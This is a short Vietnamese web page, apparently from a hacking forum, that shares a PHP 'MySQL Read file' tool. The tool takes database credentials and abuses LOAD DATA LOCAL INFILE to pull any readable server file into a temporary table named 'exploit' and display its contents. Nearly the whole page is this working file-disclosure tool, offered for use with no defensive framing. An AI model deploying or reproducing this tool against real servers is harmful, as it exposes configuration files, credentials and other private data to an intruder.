MySQL Read file :
trang này đã được đọc lầnVới một database trên một server, bạn có khả năng read mọi file (dĩ nhiên là set permission cho phép đọc)
với tool này :
<head>
<title>
COPYRIGHT BY WINDAK
</title>
</head>
<body bgcolor="#008080">
<p align="center">
<i><b>Copyright by Windak</b></i></p>
<!-- T?o table ?? query -->
<form action=<? echo $HTTP_SERVER_VARS['PHP_SELF'] ?> method=post>
<table align="center" border=3 cellpadding="3" cellspacing="2" bordercolor="#ffffff" width="420" height="321"> <tr> <td bgcolor="#00FFFF" width="72" height="22">
<b>Server</b> </td>
<td width="329" height="22">
<input name=server value="<? echo $server ?>" size=30 style="HEIGHT: 22px; WIDTH: 321px">
</td></tr> <tr> <td bgcolor="#00FFFF" width="72" height="22"><b>Username</b> </td>
<td width="329" height="22">
<input name=username value="<? echo $username ?>" size=30 style="HEIGHT: 22px; WIDTH: 321px">
</td></tr>
<tr> <td bgcolor="#00FFFF" width="72" height="22">
<b>Password</b> </td>
<td width="329" height="22">
<input name=password value="<? echo $password ?>" size=30 style="HEIGHT: 22px; WIDTH: 321px">
</td></tr>
<tr> <td bgcolor="#00FFFF" width="72" height="22">
<b>Database</b> </td>
<td width="329" height="22">
<input name=database value="<? echo $database ?>" size=30 style="HEIGHT: 22px; WIDTH: 321px">
</td></tr>
<tr> <td bgcolor="#00FFFF" width="72" height="22">
<b>Read File</b></td>
<td width="329" height="22">
<input name=file value="<? echo $file ?>" size=30 style="HEIGHT: 22px; WIDTH: 321px">
</td></tr>
<tr> <td bgcolor="#00FFFF" width="401" colspan="2" height="26">
<p align="center">
<input type="submit" name=read value="Okie Read">
</td> </tr> </table></form>
<!-- T?o command -->
<? //Khoi tao $self=$HTTP_SERVER_VARS['PHP_SELF']; $foo="exploit";
if (isset($HTTP_POST_VARS['read']))
{ //Thiet lap Query $conn = mysql_connect("$server","$username","$password");
mysql_select_db($database);
if (!conn) { echo mysql_error();
exit;
} if (isset($HTTP_POST_VARS['read']))
{ if (!mysql_query("create table $foo( $foo LONGBLOB NOT NULL) "))
{ echo mysql_error();
mysql_query("DROP TABLE $foo"); exit;
} if (!mysql_query("LOAD DATA LOCAL INFILE '$file' INTO TABLE $foo FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'"))
{ echo mysql_error(); mysql_query("DROP TABLE $foo");
exit; }
$query = "Select * from $foo"; }
//Chay $res=mysql_query($query);
if (!$res){ echo mysql_error();
} echo "
<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" \"border-collapse: collapse\" bordercolor=\"#111111\" width=\"100%\" id=\"AutoNumber1\">" ;
echo "<tr>"; $ncols = mysql_num_fields($res);
while($i<$ncols)
{ $meta = mysql_fetch_field ($res);
echo "<td> <b>". $meta->name ."
</b> </td>" ; $i++;
} echo "</tr>"; while($data=mysql_fetch_array($res))
{ echo("<tr>"); for($i=0; $i<$ncols; $i++)
{ echo "<td> ". $data[$i] ." </td>";
} echo("</tr>");
} mysql_query("DELETE FROM $foo");
mysql_query("DROP TABLE $foo");
mysql_free_result($res);
} ?>
</table></body> </html>
